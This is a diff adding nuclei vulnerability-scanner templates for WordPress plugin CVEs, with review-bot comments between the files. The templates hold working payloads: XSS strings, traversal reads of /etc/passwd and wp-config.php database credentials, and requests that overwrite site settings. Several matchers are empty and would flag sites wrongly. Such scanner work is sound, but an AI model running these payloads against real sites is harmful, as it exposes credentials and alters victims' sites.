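Review bot: A positive match for CVE-2014-8799-2414.yaml means the scanner has just pulled the target's `wp-config.php`, including `DB_PASSWORD`, into its own output, so the template should say so: a comment such as `# NOTE: a hit retrieves live database credentials; avoid -store-resp/-include-rr on shared infrastructure` above the `path:` entry would make that explicit. The `name` says `2.5.2` while the description says the bug is fixed in `2.5.4`, so the version in the name is presumably the tested one rather than the last vulnerable one; aligning it with the description (`< 2.5.4`) avoids under-reporting.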
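Review bot: In CVE-2014-9094-2420.yaml the first matcher has neither a `part:` nor a real word, only `- ""`, so it matches every response and the template reduces to "HTML page returned 200"; the word should be the decoded reflection of what the request sends (`"><script>alert(1)</script>`) with `part: body`, as the other templates in this batch do. The `info` block also lacks a `tags:` entry, and the payload uses `alert(1)` while every sibling uses `alert(document.domain)`; either is fine, but the batch should be consistent so a single body word can be shared. The description names two injectable parameters, `swfloc` and `designrand`, but only `swfloc` is exercised, which is worth stating in a comment so nobody assumes `designrand` was tested.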
diff --git a/poc/cve/CVE-2014-9444-2424.yaml b/poc/cve/CVE-2014-9444-2424.yaml
new file mode 100644
index 0000000000..4a440d1e5c
--- /dev/null
+++ b/poc/cve/CVE-2014-9444-2424.yaml
@@ -0,0 +1,38 @@
+id: CVE-2014-9444
+
+info:
+ name: Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting
+ author: daffainfo
+ severity: medium
+ description: The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability.
+ reference:
+ - https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-9444
+ - http://packetstormsecurity.com/files/129749/WordPress-Frontend-Uploader-0.9.2-Cross-Site-Scripting.html
+ - http://www.securityfocus.com/bid/71808
+ classification:
+ cve-id: CVE-2014-9444
+ tags: cve,cve2014,wordpress,wp-plugin,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ''
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/25
diff --git a/poc/cve/CVE-2015-1000012-2460.yaml b/poc/cve/CVE-2015-1000012-2460.yaml
new file mode 100644
index 0000000000..97d765e6ff
--- /dev/null
+++ b/poc/cve/CVE-2015-1000012-2460.yaml
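Review bot: The request in CVE-2014-9444-2424.yaml hits the site root (`/?page_id=0&&errors[...]`) rather than a plugin path, so on any WordPress site without Frontend Uploader the response is still an HTML 200 page, and with the body word reduced to the empty string `''` every such site is reported as vulnerable. The word needs to be the decoded reflected payload, `</script><script>alert(document.domain)</script>`, for a match to depend on the plugin actually echoing `errors[fu-disallowed-mime-type][0][name]`. The doubled `&&` in the query is harmless but looks like a typo; a single `&` reads as intended.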
@@ -0,0 +1,31 @@
+id: CVE-2015-1000012
+
+info:
+ name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
+ author: daffainfo
+ severity: high
+ reference:
+ - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2015-1000012
+ cwe-id: CWE-200
+ description: "Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin"
+
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2015-4414-2532.yaml b/poc/cve/CVE-2015-4414-2532.yaml
new file mode 100644
index 0000000000..cda6e987c4
--- /dev/null
+++ b/poc/cve/CVE-2015-4414-2532.yaml
@@ -0,0 +1,27 @@
+id: CVE-2015-4414
+
+info:
+ name: WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in download_audio.php in the SE HTML5 Album Audio Player (se-html5-album-audio-player) plugin 1.1.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
+ reference:
+ - https://www.exploit-db.com/exploits/37274
+ - https://www.cvedetails.com/cve/CVE-2015-4414
+
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/poc/cve/CVE-2015-5461-2556.yaml b/poc/cve/CVE-2015-5461-2556.yaml
new file mode 100644
index 0000000000..389a404f21
--- /dev/null
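Review bot: CVE-2015-1000012-2460.yaml classifies an arbitrary file read via `downloadpage.php?url=/etc/passwd` as `cwe-id: CWE-200`, while the RobotCPA template in this same batch uses `CWE-22` for the same class of bug; CWE-200 is the consequence, not the weakness, so `cwe-id: CWE-22` keeps the batch consistent and lets CWE-based filtering find it. The `info` block also has two blank lines where `tags:` belongs; `tags: cve,cve2015,wordpress,wp-plugin,lfi` matches the siblings. The parameter is named `url`, so it may accept schemes as well as paths, which would make this more than a local read; that is not established by anything here and is worth a `# TODO confirm` rather than a claim.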
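Review bot: The regex matcher in CVE-2015-4414-2532.yaml has no `part:`; nuclei presumably defaults regex matchers to the body, but every other traversal template in this batch spells out `part: body`, and the stray blank line under `matchers:` suggests the block was pasted from one of them with a line dropped, so `part: body` should be restored. The `info` block is also missing `tags:`, leaving this template out of `-tags lfi` and `-tags wordpress` runs; `tags: cve,cve2015,wordpress,wp-plugin,lfi` matches the siblings.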
+++ b/poc/cve/CVE-2015-5461-2556.yaml
@@ -0,0 +1,21 @@
+id: CVE-2015-5461
+info:
+ name: StageShow <= 5.0.8 - Open Redirect
+ author: 0x_Akoko
+ severity: medium
+ description: Open redirect vulnerability in the Redirect function in stageshow_redirect.php in the StageShow plugin before 5.0.9 for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter.
+ reference:
+ - https://wpscan.com/vulnerability/afc0d5b5-280f-424f-bc3e-d04452e56e16
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-5461
+ classification:
+ cve-id: CVE-2015-5461
+ tags: redirect,cve,cve2015,wordpress,wp-plugin
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com"
+ matchers:
+ - type: regex
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ part: header
diff --git a/poc/cve/CVE-2015-9480-2630.yaml b/poc/cve/CVE-2015-9480-2630.yaml
new file mode 100644
index 0000000000..b7aa9e0fe9
--- /dev/null
+++ b/poc/cve/CVE-2015-9480-2630.yaml
@@ -0,0 +1,28 @@
+id: CVE-2015-9480
+info:
+ name: WordPress Plugin RobotCPA 5 - Directory Traversal
+ author: daffainfo
+ severity: high
+ reference:
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480
+ - https://www.exploit-db.com/exploits/37252
+ tags: cve,cve2015,wordpress,wp-plugin,lfi
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2015-9480
+ cwe-id: CWE-22
+ description: "The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter."
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ part: body
+ - type: status
+ status:
+ - 200
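Review bot: The Location regex in CVE-2015-5461-2556.yaml allows any run of `[a-zA-Z0-9\-_\.@]*` before `example.com`, so a redirect to a host such as `notexample.com` or to `something@example.com` also matches; since the template controls the probe, sending a distinctive host and matching it exactly is tighter, e.g. `- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:www\.)?example\.com(?:[/?#].*)?$'`. There is no status matcher either, so any response that happens to carry a matching `Location` header (including a 200 with a meta-refresh-style header) counts; a `3xx` status matcher under `matchers-condition: and` would pin it to an actual redirect. The opaque `l=` parameter in the RobotCPA template further down this line is base64 for `file:///etc/passwd`, which is worth a one-line comment above the path so reviewers do not have to decode it.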
diff --git a/poc/cve/CVE-2016-1000135-2684.yaml b/poc/cve/CVE-2016-1000135-2684.yaml
new file mode 100644
index 0000000000..5fbb768196
--- /dev/null
+++ b/poc/cve/CVE-2016-1000135-2684.yaml
@@ -0,0 +1,35 @@
+id: CVE-2016-1000135
+
+info:
+ name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via mychannel.php
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin hdw-tube v1.2
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000135
+ cwe-id: CWE-79
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2016-1000146-2721.yaml b/poc/cve/CVE-2016-1000146-2721.yaml
new file mode 100644
index 0000000000..e5f3bb2231
--- /dev/null
+++ b/poc/cve/CVE-2016-1000146-2721.yaml
@@ -0,0 +1,39 @@
+id: CVE-2016-1000146
+
+info:
+ name: Pondol Form to Mail <= 1.1 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin pondol-formmail v1.1
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000146
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=787
+ - https://wordpress.org/plugins/pondol-formmail
+ - http://www.securityfocus.com/bid/93584
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2016-1000146
+ cwe-id: CWE-79
+ tags: cve,cve2016,wordpress,xss,wp-plugin,mail
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2016-1000149-2728.yaml b/poc/cve/CVE-2016-1000149-2728.yaml
new file mode 100644
index 0000000000..b74aee23a4
--- /dev/null
+++ b/poc/cve/CVE-2016-1000149-2728.yaml
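Review bot: The payload in CVE-2016-1000146-2721.yaml starts with `%22%3E` (`">`) before the `</script><script>` sequence, so the reflected string differs from the siblings and the body word must match this template's own payload, `"></script><script>alert(document.domain)</script>`, rather than the shared one; as committed the word is the empty string and matches everything. The `cvss-score` is written `6.1` here and `6.10` in the neighbouring templates; harmless, but the batch should pick one form.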
@@ -0,0 +1,30 @@
+id: CVE-2016-1000149
+info:
+ name: Simpel Reserveren 3 <= 3.5.2 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000149
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000149
+ cwe-id: CWE-79
+ description: "Reflected XSS in wordpress plugin simpel-reserveren v3.5.2"
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+ - type: word
+ part: header
+ words:
+ - text/html
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2017-17043-2975.yaml b/poc/cve/CVE-2017-17043-2975.yaml
new file mode 100644
index 0000000000..3a3a2296f1
--- /dev/null
+++ b/poc/cve/CVE-2017-17043-2975.yaml
@@ -0,0 +1,30 @@
+id: CVE-2017-17043
+info:
+ name: Emag Marketplace Connector 1.0 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043
+ tags: cve,cve2017,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2017-17043
+ cwe-id: CWE-79
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+ - type: word
+ part: header
+ words:
+ - text/html
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2017-18536-2993.yaml b/poc/cve/CVE-2017-18536-2993.yaml
new file mode 100644
index 0000000000..4f60e9dca3
--- /dev/null
+++ b/poc/cve/CVE-2017-18536-2993.yaml
@@ -0,0 +1,35 @@
+id: CVE-2017-18536
+
+info:
+ name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
+ reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501
+ tags: cve,cve2017,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2017-18536
+ cwe-id: CWE-79
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2018-18069-3426.yaml b/poc/cve/CVE-2018-18069-3426.yaml
new file mode 100644
index 0000000000..6ead1487c8
--- /dev/null
+++ b/poc/cve/CVE-2018-18069-3426.yaml
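Review bot: CVE-2017-18536-2993.yaml probes the WordPress root with `/?author=1</script>...`, a URL every WordPress site answers with an HTML page, and its body word is the empty string `""`, so on this listing the template flags every WordPress install regardless of whether Stop User Enumeration is present. The word must be the decoded reflected payload, `</script><script>alert(document.domain)</script>`, and since core WordPress itself never echoes `author` unescaped, that single word is what distinguishes the plugin's vulnerable handler from a normal author archive or 404. The NVD link is missing from `reference:`, unlike the rest of the batch; adding `- https://nvd.nist.gov/vuln/detail/CVE-2017-18536` keeps the references uniform.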
@@ -0,0 +1,24 @@
+id: CVE-2018-18069
+info:
+ name: Wordpress unauthenticated stored xss
+ author: nadino
+ severity: medium
+ description: process_forms in the WPML (aka sitepress-multilingual-cms) plugin through 3.6.3 for WordPress has XSS via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php.
+ tags: cve,cve2018,wordpress,xss,plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2018-18069
+ cwe-id: CWE-79
+ reference:
+ - https://0x62626262.wordpress.com/2018/10/08/sitepress-multilingual-cms-plugin-unauthenticated-stored-xss/
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/wp-admin/admin.php"
+ body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN">'
+ redirects: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(tolower(all_headers), "text/html") && contains(set_cookie, "_icl_current_admin_language") && contains(body, "\">")'
diff --git a/poc/cve/CVE-2018-3810-3554.yaml b/poc/cve/CVE-2018-3810-3554.yaml
new file mode 100644
index 0000000000..0527d91a3c
--- /dev/null
+++ b/poc/cve/CVE-2018-3810-3554.yaml
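Review bot: `name` calls this an unauthenticated stored XSS while `description` says the request is authenticated, and the template sends the POST with no login step, so the metadata contradicts itself; the reference title says unauthenticated, which makes `description` the likelier field to fix, but confirm against the source. The request also persists a setting on the target (`icl_post_action=save_theme_localization&locale_file_name_en=...`) and never resets it, so the template modifies scan targets without being marked as such; `tags: cve,cve2018,wordpress,xss,wp-plugin,intrusive` would let operators exclude it and would also align `plugin` with the `wp-plugin` tag used by the sibling templates. With `redirects: true`, an unauthenticated target will most likely bounce to wp-login.php where the `_icl_current_admin_language` cookie check does not hold, so the matcher probably fails closed today — worth confirming before relying on it.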
@@ -0,0 +1,49 @@
+id: CVE-2018-3810
+
+info:
+ name: Oturia WordPress Smart Google Code Inserter <3.5 - Authentication Bypass
+ author: princechaddha
+ severity: critical
+ description: Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code.
+ reference:
+ - https://www.exploit-db.com/exploits/43420
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-3810
+ - https://wordpress.org/plugins/smart-google-code-inserter/#developers
+ - https://limbenjamin.com/articles/smart-google-code-inserter-auth-bypass.html
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2018-3810
+ cwe-id: CWE-287
+ tags: wordpress,cve,cve2018,google
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/wp-admin/options-general.php?page=smartcode"
+
+ body: 'sgcgoogleanalytic=&sgcwebtools=&button=Save+Changes&action=savegooglecode'
+ headers:
+ Content-Type: application/x-www-form-urlencoded
+
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "text/html"
+ part: header
+
+ - type: word
+ words:
+ - ''
+ part: body
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/05/13
diff --git a/poc/cve/CVE-2018-7422-3595.yaml b/poc/cve/CVE-2018-7422-3595.yaml
new file mode 100644
index 0000000000..e5d8381a22
--- /dev/null
+++ b/poc/cve/CVE-2018-7422-3595.yaml
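Review bot: The first request writes to the target: it submits `sgcgoogleanalytic=&sgcwebtools=...&action=savegooglecode`, which per the description replaces the code the plugin injects into every page, so a scan overwrites whatever the site owner had configured and the change persists after the scan. That is a state-changing, destructive check and should at least carry the `intrusive` tag (`tags: wordpress,cve,cve2018,google,intrusive`) and a sentence in `description` or a comment stating that the stored setting is replaced, so operators can exclude it from routine scans. The second request has nothing that ties its result to the first (200, `text/html` and a body word any WordPress front page satisfies), so the template cannot distinguish a successful write from a no-op; it needs to match on a marker that only appears if the first request took effect.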
@@ -0,0 +1,37 @@
+id: CVE-2018-7422
+info:
+ name: WordPress Site Editor <=1.1.1 - Local File Inclusion
+ author: LuskaBol,0x240x23elu
+ severity: high
+ description: |
+ WordPress Site Editor through 1.1.1 allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.
+ reference:
+ - https://www.exploit-db.com/exploits/44340
+ - http://seclists.org/fulldisclosure/2018/Mar/40
+ - https://wpvulndb.com/vulnerabilities/9044
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-7422
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2018-7422
+ cwe-id: CWE-22,CWE-829
+ tags: cve,cve2018,wordpress,wp-plugin,lfi
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php'
+ - "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"
+ matchers-condition: or
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "DB_NAME"
+ - "DB_PASSWORD"
+ condition: and
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0:"
+
+# Enhanced by mp on 2022/06/17
diff --git a/poc/cve/CVE-2018-8719-3640.yaml b/poc/cve/CVE-2018-8719-3640.yaml
new file mode 100644
index 0000000000..022985a814
--- /dev/null
+++ b/poc/cve/CVE-2018-8719-3640.yaml
@@ -0,0 +1,35 @@
+id: CVE-2018-8719
+
+info:
+ name: WordPress Plugin WP Security Audit Log 3.1.1 - Information Disclosure
+ author: LogicalHunter
+ severity: medium
+ description: Access to wp-content/uploads/wp-security-audit-log/* files is not restricted. For example, these files are indexed by Google and allows for attackers to possibly find sensitive information
+ reference:
+ - https://www.exploit-db.com/exploits/44371
+ - https://vuldb.com/?id.115817
+ - https://www.cvedetails.com/cve/CVE-2018-8719/
+ tags: wordpress,wp-plugin,cve,cve2018,exposure
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.30
+ cve-id: CVE-2018-8719
+ cwe-id: CWE-532
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/uploads/wp-security-audit-log/failed-logins/"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "[TXT]"
+ - ".log"
+ - "Index of"
+ condition: and
diff --git a/poc/cve/CVE-2018-9118-3654.yaml b/poc/cve/CVE-2018-9118-3654.yaml
new file mode 100644
index 0000000000..2128af7254
--- /dev/null
+++ b/poc/cve/CVE-2018-9118-3654.yaml
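Review bot: The body matcher requires `[TXT]`, `.log` and `Index of` together (`condition: and`), and `[TXT]` is the icon alt-text of Apache's mod_autoindex listing; an nginx `autoindex` page (or Apache configured without icons) shows `Index of` and the `.log` filenames but no `[TXT]`, so the same exposure goes unreported. Dropping `[TXT]` and keeping `.log` plus `Index of` covers both servers without loosening the check much; alternatively add a second word matcher for the nginx layout and switch the outer condition to `or`. The description also speaks of the whole `wp-security-audit-log/*` directory while the template probes only `failed-logins/`, which is worth stating so readers know a clean result does not cover the other subdirectories.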
@@ -0,0 +1,41 @@
+id: CVE-2018-9118
+
+info:
+ name: WordPress 99 Robots WP Background Takeover Advertisements <=4.1.4 - Local File Inclusion
+ author: 0x_Akoko
+ severity: high
+ description: |
+ WordPress 99 Robots WP Background Takeover Advertisements 4.1.4 is susceptible to local file inclusion via exports/download.php.
+ reference:
+ - https://www.exploit-db.com/exploits/44417
+ - https://wpvulndb.com/vulnerabilities/9056
+ - https://99robots.com/docs/wp-background-takeover-advertisements/
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-9118
+ remediation: |
+ Upgrade to 4.1.15.
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2018-9118
+ cwe-id: CWE-22
+ tags: edb,cve,cve2018,wordpress,wp-plugin,lfi,traversal,wp
+ metadata:
+ max-request: 1
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "DB_NAME"
+ - "DB_PASSWORD"
+ - "DB_HOST"
+ - "The base configurations of the WordPress"
+ condition: and
+
+# Enhanced by mp on 2022/06/15
diff --git a/poc/cve/CVE-2019-14470-3854.yaml b/poc/cve/CVE-2019-14470-3854.yaml
new file mode 100644
index 0000000000..fc6a5ee0a8
--- /dev/null
+++ b/poc/cve/CVE-2019-14470-3854.yaml
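Review bot: `matchers-condition: and` governs a single matcher here, so it is a no-op; either drop it or add the status matcher the sibling LFI templates in this commit carry (`- type: status` / `status:` / `- 200`) so an error page that happens to echo the probe does not count. The four wp-config.php markers with `condition: and` are otherwise a reasonably tight fingerprint. This file uses the newer `http:` key while most others in the commit use `requests:`, which is fine for current engines but is a mix worth knowing about if the repository is consumed by older tooling.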
@@ -0,0 +1,39 @@
+id: CVE-2019-14470
+
+info:
+ name: WordPress Plugin UserPro 4.9.32 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: cosenary Instagram-PHP-API (aka Instagram PHP API V2), as used in the UserPro plugin through 4.9.32 for WordPress, has XSS via the example/success.php error_description parameter.
+ reference:
+ - https://wpscan.com/vulnerability/9815
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470
+ - http://packetstormsecurity.com/files/154206/WordPress-UserPro-4.9.32-Cross-Site-Scripting.html
+ - https://wpvulndb.com/vulnerabilities/9815
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2019-14470
+ cwe-id: CWE-79
+ tags: cve,cve2019,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2019-15889-3905.yaml b/poc/cve/CVE-2019-15889-3905.yaml
new file mode 100644
index 0000000000..f5e335b75a
--- /dev/null
+++ b/poc/cve/CVE-2019-15889-3905.yaml
@@ -0,0 +1,38 @@
+id: CVE-2019-15889
+
+info:
+ name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The download-manager plugin before 2.9.94 for WordPress has XSS via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
+ reference:
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
+ - https://www.cybersecurity-help.cz/vdb/SB2019041819
+ - https://wordpress.org/plugins/download-manager/#developers
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2019-15889
+ cwe-id: CWE-79
+ tags: cve,cve2019,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2019-16525-3935.yaml b/poc/cve/CVE-2019-16525-3935.yaml
new file mode 100644
index 0000000000..c0b2649797
--- /dev/null
+++ b/poc/cve/CVE-2019-16525-3935.yaml
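Review bot: The request hard-codes the page slug `/wpdmpro/list-packages/`, but the description says the sink is the category shortcode, which can be placed on any page; a site using a different slug or permalink structure returns 404 and is reported clean even though the vulnerable shortcode is present elsewhere. If that slug is the plugin's default listing page, say so in `description` so the limitation is visible; otherwise consider parameterising the path via `payloads:` or documenting that the check only covers the default page.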
@@ -0,0 +1,35 @@
+id: CVE-2019-16525
+
+info:
+ name: Wordpress Plugin Checklist <= 1.1.5 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: An XSS issue was discovered in the checklist plugin before 1.1.9 for WordPress. The fill parameter is not correctly filtered in the checklist-icon.php file, and it is possible to inject JavaScript code.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16525
+ tags: cve,cve2019,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2019-16525
